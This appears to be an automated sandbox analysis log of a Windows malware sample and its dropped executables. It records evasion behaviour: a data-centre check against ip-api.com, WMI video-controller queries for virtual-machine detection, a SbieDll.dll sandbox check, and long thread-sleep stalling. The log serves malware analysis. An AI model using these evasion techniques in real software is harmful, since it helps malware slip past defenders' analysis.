Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\adawsfaefasfasfg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\adawsfaefasfasfg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\wasdwasfwasfs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\wasdwasfwasfs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: adawsfaefasfasfg.exe, 00000002.00000002.2592447973.0000000003081000.00000004.00000800.00020000.00000000.sdmp, wasdwasfwasfs.exe, 00000003.00000002.2591449977.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: ozgpPwVAu1.exe, 00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, adawsfaefasfasfg.exe, 00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmp, wasdwasfwasfs.exe, 00000003.00000000.1323412676.0000000000C82000.00000002.00000001.01000000.00000007.sdmp, adawsfaefasfasfg.exe.0.dr, wasdwasfwasfs.exe.0.dr, Systen User.2.dr	Binary or memory string: SBIEDLL.DLLINFO

Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Memory allocated: 1300000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Memory allocated: 1AD00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Memory allocated: 14F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Memory allocated: 1B080000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Memory allocated: 11B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Memory allocated: 1AEA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Systen User	Memory allocated: 1830000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Systen User	Memory allocated: 1B1B0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\ozgpPwVAu1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 599870	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 599761	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 599436	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 599148	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 599030	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 598922	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 598812	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 598703	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 598593	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 598484	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 598265	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 598047	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 597811	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 597374	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 597152	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 597046	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 596933	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 596827	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 596580	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 596460	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 596108	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 595999	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 595880	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 595637	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 595530	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 595421	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 595312	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 595093	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 594874	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 594752	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 594619	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 594464	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 594334	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 594203	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Thread delayed: delay time: 594093	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 599873	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 599280	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 599170	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 599062	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 598402	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 598172	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 598062	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 597943	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 596907	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 596447	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 595655	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 594867	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 594609	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 594314	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 594200	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 594078	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Thread delayed: delay time: 593968	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Systen User	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\adawsfaefasfasfg.exe	Window / User API: threadDelayed 7256	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe	Window / User API: threadDelayed 2559	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Window / User API: threadDelayed 3501	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe	Window / User API: threadDelayed 6323	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8641	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 885	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8525
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1049
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5767
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1385
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6258
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1117
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7545
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1648
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7559
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1982

Source: C:\Users\user\Desktop\ozgpPwVAu1.exe TID: 7664	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -35971150943733603s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3820	Thread sleep count: 7256 > 30	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -599870s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -599761s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3820	Thread sleep count: 2559 > 30	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -599546s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -599436s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -599148s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -599030s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -598922s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -598812s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -598703s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -598593s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -598484s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -598375s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -598265s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -598156s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -598047s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -597922s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -597811s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -597593s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -597484s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -597374s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -597265s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -597152s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -597046s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -596933s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -596827s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -596718s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -596580s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -596460s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -596344s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -596219s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -596108s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -595999s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -595880s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -595750s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -595637s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -595530s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -595421s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -595312s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -595203s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -595093s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -594984s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -594874s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -594752s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -594619s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -594464s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -594334s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -594203s >= -30000s	Jump to behavior
Source: C:\Users\user\adawsfaefasfasfg.exe TID: 3104	Thread sleep time: -594093s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -22136092888451448s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -599873s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -599655s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -599280s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -599170s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -599062s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -598953s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -598844s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -598734s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -598625s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -598515s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -598402s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -598281s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -598172s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -598062s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -597943s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -597812s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -597594s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -597469s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -597250s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -597140s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -596907s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -596781s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -596672s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -596562s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -596447s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -596328s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -596219s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -596109s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -596000s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -595890s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -595765s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -595655s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -595547s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -595437s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -595328s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -595219s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -595094s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -594984s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -594867s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -594750s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -594609s >= -30000s	Jump to behavior
Source: C:\Users\user\wasdwasfwasfs.exe TID: 8128	Thread sleep time: -594314s >= -30000s	Jump to behavior
